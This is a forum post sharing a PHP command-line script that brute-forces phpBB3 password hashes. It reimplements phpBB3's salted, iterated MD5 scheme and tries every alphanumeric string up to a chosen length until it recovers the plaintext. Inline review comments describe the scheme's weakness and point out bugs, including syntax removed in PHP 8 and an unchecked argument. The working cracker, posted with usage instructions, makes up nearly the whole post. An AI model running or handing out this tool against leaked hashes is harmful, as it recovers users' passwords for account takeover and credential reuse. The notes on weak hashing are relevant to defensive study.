|   | bleu moon | 07-08-2011 06:49 PM |  
 phpbb3 hash bruteforce
  كود: 
 /////////////////////////////////////////////////////////////////// R00TSECURITY.ORG - YOUR SECURITY COMMUNITY
 // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 // [2008-07-15] PhpBB3 Hash Bruteforce
 // http://r00tsecurity.org/db/code/134
 // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 // GENERATED ON: 2011-07-08 | 19:18:07
 /////////////////////////////////////////////////////////////////
 
 
 CODE INFO
 USAGE:
 php script.php 'hash' chars
 
 SOURCE CODE
 #!/usr/bin/php
 <?php
 // Lift PHP's execution time limit for this run.
 set_time_limit(0);
 
 // Banner, printed on every invocation before any argument is examined.
 echo "///////////////////////////////////////////////\r\n";
 echo "//         PHPBB3 Bruteforce             //\r\n";
 echo "//  Original bruteforce script by Tux      //\r\n";
 echo "//     Moded for Phpbb3 by Jeforce     //\r\n";
 echo "//     http://www.jeforce.net            //\r\n";
 echo "////////////////////////////////////////////\r\n";
 
 // Show the usage text and stop when no argument was given or --help was asked for.
 // NOTE(review): only $argc<2 is tested, yet $argv[2] is read further down in this
 // listing; with a single argument that read is an undefined offset.
 if ($argc<2 || $argv[1]=='--help') {
 echo<<<END
 USAGE: {$argv[0]} 'hash' chars
 - hash        : The hash to crack
 - chars        : Max length string to attempt to crack
 
 HELP: {$argv[0]} --help
 
 
 END;
 exit;
 }
 // phpBB3 password hashing functions
 
 /**
  * Compute the phpBB3 "$H$" portable hash of a password.
  *
  * Cost and salt are taken from $setting: the character at offset 3 selects
  * log2 of the round count (its position in $itoa64) and offsets 4-11 hold
  * the 8-character salt. The digest is MD5 over salt+password, then MD5 over
  * digest+password repeated 2^cost times.
  *
  * Review note: this is salted, iterated MD5 and nothing more, so a leaked
  * hash can be tested against guesses offline at the speed of MD5. Stores
  * that still hold "$H$" values are better served by rehashing with
  * password_hash() on the next successful login. The cost is read from the
  * hash string itself (up to 2^30 rounds), so verifying a hash string that
  * comes from an untrusted source can be made CPU-expensive.
  *
  * @param string $password Password to hash.
  * @param string $setting  Existing hash or setting string ("$H$" + cost + salt).
  * @param string $itoa64   64-character encoding alphabet (taken by reference, not modified here).
  * @return string The 34-character hash, or '*' when $setting is rejected.
  */
 function _hash_crypt_private($password, $setting, &$itoa64)
 {
     $rejected = '*';

     // Only the "$H$" identifier is accepted.
     if (substr($setting, 0, 3) != '$H$') {
         return $rejected;
     }

     // A cost character that is not in the alphabet makes strpos() return
     // false, which also fails the lower bound below.
     $cost_exponent = strpos($itoa64, $setting[3]);
     if ($cost_exponent < 7 || $cost_exponent > 30) {
         return $rejected;
     }

     $salt = substr($setting, 4, 8);
     if (strlen($salt) != 8) {
         return $rejected;
     }

     // One initial MD5 over salt+password, then 2^cost chained rounds.
     $digest = pack('H*', md5($salt . $password));
     for ($rounds_left = 1 << $cost_exponent; $rounds_left > 0; $rounds_left--) {
         $digest = pack('H*', md5($digest . $password));
     }

     // Identifier, cost and salt (12 characters) followed by the encoded 16-byte digest.
     return substr($setting, 0, 12) . _hash_encode64($digest, 16, $itoa64);
 }
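 /**
  * Build a "$H$" setting string (identifier, cost character, encoded salt).
  *
  * The requested cost is replaced by 8 when it lies outside 4..31, then
  * raised by 5 on PHP 5 and later (3 otherwise) and capped at 30 before it is
  * mapped to a character of $itoa64. Six bytes of $input are encoded as the
  * salt.
  *
  * The PHP version test uses version_compare(): the previous
  * `PHP_VERSION >= 5` compared a version string with an integer and so
  * depended on type juggling (a string comparison on PHP 8).
  *
  * Review note: the salt is only as unpredictable as $input; this function
  * does not generate randomness itself. It is not called in the visible part
  * of this listing.
  *
  * @param string $input                Raw bytes for the salt; the first 6 are used.
  * @param string $itoa64               64-character encoding alphabet (by reference, not modified here).
  * @param int    $iteration_count_log2 Requested log2 of the round count.
  * @return string Setting string usable as $setting in _hash_crypt_private().
  */
 function _hash_gensalt_private($input, &$itoa64, $iteration_count_log2 = 6)
 {
     if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31) {
         $iteration_count_log2 = 8;
     }

     // Explicit version comparison instead of comparing a string with an int.
     $cost_bonus = version_compare(PHP_VERSION, '5.0.0', '>=') ? 5 : 3;

     $output = '$H$';
     $output .= $itoa64[min($iteration_count_log2 + $cost_bonus, 30)];
     $output .= _hash_encode64($input, 6, $itoa64);

     return $output;
 }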
 
 /**
  * Encode the first $count bytes of $input with the 64-character alphabet.
  *
  * Bytes are consumed in groups of up to three, least significant byte
  * first, and each group is emitted as 6-bit characters (four for a full
  * group, two or three for a trailing partial group).
  *
  * @param string $input  Raw bytes to encode.
  * @param int    $count  Number of bytes of $input to encode.
  * @param string $itoa64 64-character alphabet (by reference, not modified here).
  * @return string Encoded text.
  */
 function _hash_encode64($input, $count, &$itoa64)
 {
     $encoded = '';
     $pos = 0;

     while (true) {
         // First byte of the group: low 6 bits.
         $bits = ord($input[$pos]);
         $pos++;
         $encoded .= $itoa64[$bits & 0x3f];

         // Second byte, when present, supplies bits 8-15.
         if ($pos < $count) {
             $bits |= ord($input[$pos]) << 8;
         }
         $encoded .= $itoa64[($bits >> 6) & 0x3f];
         $pos++;
         if ($pos > $count) {
             break;
         }

         // Third byte, when present, supplies bits 16-23.
         if ($pos < $count) {
             $bits |= ord($input[$pos]) << 16;
         }
         $encoded .= $itoa64[($bits >> 12) & 0x3f];
         $pos++;
         if ($pos > $count) {
             break;
         }

         $encoded .= $itoa64[($bits >> 18) & 0x3f];
         if ($pos >= $count) {
             break;
         }
     }

     return $encoded;
 }
 /**
  * Tell whether $password produces the stored $hash.
  *
  * A 34-character $hash is treated as a "$H$" portable hash and recomputed
  * with _hash_crypt_private(); any other length is compared against the
  * plain, unsalted md5() of the password.
  *
  * Review note: both comparisons use ===, which is not constant-time. Where
  * this check guards a login, hash_equals() (PHP 5.6+) is the safer
  * comparison, and the unsalted MD5 branch is a legacy format that should be
  * migrated rather than kept.
  *
  * @param string $password Candidate password.
  * @param string $hash     Stored hash to compare against.
  * @return bool True on a match.
  */
 function phpbb_check_hash($password, $hash)
 {
     $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';

     // Anything that is not 34 characters long falls back to plain MD5.
     if (strlen($hash) != 34) {
         return md5($password) === $hash;
     }

     return _hash_crypt_private($password, $hash, $itoa64) === $hash;
 }
 
 // Review note: everything below is an exhaustive offline search. It needs
 // only the hash string, so server-side controls such as login rate limiting
 // no longer apply once hashes have leaked; what remains is the per-guess
 // cost of the hash (2^cost + 1 MD5 calls in _hash_crypt_private) and the
 // size of the password space.
 //if(isset($argv[4])) $charset=$argv[4];
 //else $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
 
 // Fixed candidate alphabet of 62 characters (a-z, A-Z, 0-9); a password
 // containing any other character is never generated by this search.
 // NOTE(review): curly-brace string offsets ($charset{0}) were deprecated in
 // PHP 7.4 and removed in PHP 8.0.
 $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
 $charset_beginning = $charset{0};
 $charset_end = $charset{strlen($charset)-1};
 
 //$HASH = '$H$99i1.eNyzhGdi5/lAnKnSjU8iIABC80';
 // $SIZE = (int) $_GET['chars'];
 // Target hash and maximum candidate length, both taken from the command line.
 $HASH = $argv[1];
 $SIZE = (int) $argv[2];
 
 // $start is set one second in the past; presumably so that the
 // time()-$start divisor in the rate calculation is never zero.
 $start = time()-1;
 $curtotal=0;
 $total=0;
 // Total keyspace: sum of strlen($charset)^i for i = 1..$SIZE.
 for($i=$SIZE; $i>0; $i--) $total+=pow(strlen($charset), $i);
 // Interval, in candidates, between two progress lines.
 $split=ceil(($total/strlen($charset))/5);
 
 
 echo " *** MAX SIZE: $SIZE, cracking HASH: $HASH\r\n";
 echo " *** TOTAL KEYS: $total\r\n";
 echo " *** CHARSET: $charset\r\n";
 
 // Outer loop: candidate length, from 1 up to $SIZE.
 for($i=1; $i<=$SIZE; $i++) {
 $keyspace = pow(strlen($charset), $i);
 echo "\r\nAttempting to crack with $i characters.\r\n";
 echo " *** Total combinations: $keyspace\r\n";
 
 // Start from the first candidate of this length: $i copies of the first charset character.
 $key = '';
 for ($y=0; $y<$i; $y++) $key .= $charset_beginning;
 
 // NOTE(review): the bound is $keyspace+1, one more pass than there are
 // candidates; the increment below leaves the last candidate unchanged, so it
 // looks like that candidate is tested (and counted in $curtotal) twice.
 for ($x=0; $x<$keyspace+1; $x++) {
 $curtotal++;
 
 // On a match, report the elapsed time and the recovered text, then stop.
 if (phpbb_check_hash($key, $HASH)) {
 $time=(time()-$start);
 echo<<<END
 
 Successfully key cracked after $time seconds. The cracker searched a total
 of $curtotal keys out of a possible $total in $time seconds.
 
 Found the clear text of '$HASH' is '$key'.\n
 END;
 exit;
 }
 
 // Periodic progress line with the average rate since $start.
 if($x%$split == 0) {
 $rate=ceil($curtotal/(time()-$start));
 echo " ... $curtotal/$total ($key) [$rate Keys/second]\r\n";
 }
 
 // Advance $key in place like an odometer whose lowest digit is position 0:
 // bump the first position that is not at the last charset character and
 // reset every position before it to the first charset character.
 for ($y=0; $y<$i; $y++) {
 if ($key[$y] != $charset_end) {
 $key[$y] = $charset{strpos($charset, $key[$y])+1};
 
 if ($y > 0)  for ($z = 0; $z < $y; $z++) $key[$z] = $charset_beginning;
 break;
 }
 }
 }
 }
 // Reached only when no candidate up to $SIZE characters matched.
 $time=time()-$start;
 echo<<<END
 *** SORRY NO MATCHS FOUND
 Time running : $time. Keys searched : $total.\n
 END;
 ?>
 
 // http://r00tsecurity.org/db/code/134